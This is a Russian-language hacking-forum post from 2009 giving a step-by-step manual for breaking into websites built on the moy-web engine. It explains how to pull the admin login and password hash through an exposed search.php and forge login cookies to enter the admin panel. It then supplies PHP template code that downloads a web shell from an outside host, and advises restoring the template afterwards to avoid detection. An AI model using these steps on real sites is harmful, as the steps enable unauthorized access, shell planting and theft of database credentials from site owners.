Регистрация Главная Пользователи Все разделы прочитаны
Сообщения за день Справка Регистрация

[VIP] Взлом Moy-weB теперь ещё проще!

-

Подполье Lineage 2 (0 уровень)

- Темы, перенесенные из Подполья 1 уровня (архивные за 2008-2015). Отличная основа для поиска новых уязвимостей.

Ответ
 
Опции темы
Старый 11.01.2009, 10:38   #1
 Старший сержант
Аватар для OneShot
 
OneShot блестящий пример для подражанияOneShot блестящий пример для подражанияOneShot блестящий пример для подражанияOneShot блестящий пример для подражанияOneShot блестящий пример для подражанияOneShot блестящий пример для подражанияOneShot блестящий пример для подражанияOneShot блестящий пример для подражанияOneShot блестящий пример для подражанияOneShot блестящий пример для подражанияOneShot блестящий пример для подражания
Регистрация: 19.08.2008
Сообщений: 205
Популярность: 2562
Золото Zhyk.Ru: 5
Сказал(а) спасибо: 36
Поблагодарили 268 раз(а) в 122 сообщениях
Отправить сообщение для OneShot с помощью Skype™
 
Wink [VIP] Взлом Moy-weB теперь ещё проще!

Взлом moy-web уже такая заезженная тема, но этот сайт всподвиг меня на написание ещё одного мануала.
Сайты на moy-web'е постоянно появляются новые, найти их очень просто: Яндекс Гугл

Скачиваем:
Firefox
Плагин Cookies Editor для Firefox


1. Находим сайт на движке moy-web. Удобно искать запросами, которые я написал выше.
2. После того, как нашли сайт, ищем файл search.php по адресу [Ссылки могут видеть только зарегистрированные пользователи. ]
3. Если файл там есть, значит приступаем к следующему действию, если файла нет, переходим к пункту 1.
4. Теперь нам надо узнать логин админа, для этого переходим [Ссылки могут видеть только зарегистрированные пользователи. ] и вводим полный путь к search.php
5. Получили логин админа и теперь узнаем хэш админа, для этого переходим [Ссылки могут видеть только зарегистрированные пользователи. ] и вводим Логин (у меня root) и путь к файлу search.php
6. Получаем хэш админа. (у меня ec361eff84f3ef4d75214585da176f5e)

Устанавливаем Firefox и плагин для него.
Дальше идем Инструменты=>Редактор Cookies=>Добавить
Заполняем:
1. Имя=>username
2. Содержимое=>Логин администратора (у меня root)
3. Узел=> путь к сайту (БЕЗ HTTP:// напр. [Ссылки могут видеть только зарегистрированные пользователи. ])
4. Путь=>Путь к админке (у меня /news/)
Жмем сохранить.. Сохранили и добавляем еще 1 кук. Жмем добавить:
1. Имя=>md5_password
2. Содержимое=>Хэш (у меня ec361eff84f3ef4d75214585da176f5e)
3. Узел=> путь к сайту (БЕЗ [Ссылки могут видеть только зарегистрированные пользователи. ] напр. [Ссылки могут видеть только зарегистрированные пользователи. ])
4. Путь=>Путь к админке (у меня /news/)
Сохраняем… Теперь идем в админку… Воаля, вы залогинены)))

Не спешите добавить похабную новость, давайте зальем туда шелл, что бы узнать пароли от mysql и вообще управлять содержимым сайта.

Заливаем шелл:
Настройкa блока новостей=>Редактировать шаблоны=>Активные новости
Удаляем от туда всё и вставляем следующее:


Код:

Код:
HTML;
$file = file_get_contents('http://shellss.by.ru/file.txt');
$brd = fopen('file.php','w+');
$write = fwrite($brd, $file);
Внимание это тока примел шелла, заливать нада свой
Сохранить…

Через пару минут наш файл загрузится.
Заходим нашсайт.ру/news/file.php вводим логин-1 пароль-1
Потом не забудьте изменить шаблон активных новостей "как было", что бы не спалиться.
________________
[Ссылки могут видеть только зарегистрированные пользователи. ]
  Ответить с цитированием
3 пользователя(ей) сказали cпасибо:
Fix (10.03.2010), Loreg (12.03.2009), Zhyk (12.01.2009)
Ответ

Метки
взлом, проще!, moy-web, теперь

Опции темы

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход

Заявление об ответственности / Список мошенников

Часовой пояс GMT +4, время: 12:17.

Пишите нам: [email protected]
Copyright © 2024 vBulletin Solutions, Inc.
Translate: zCarot. Webdesign by DevArt (Fox)
G-gaMe! Team production | Since 2008
Hosted by GShost.net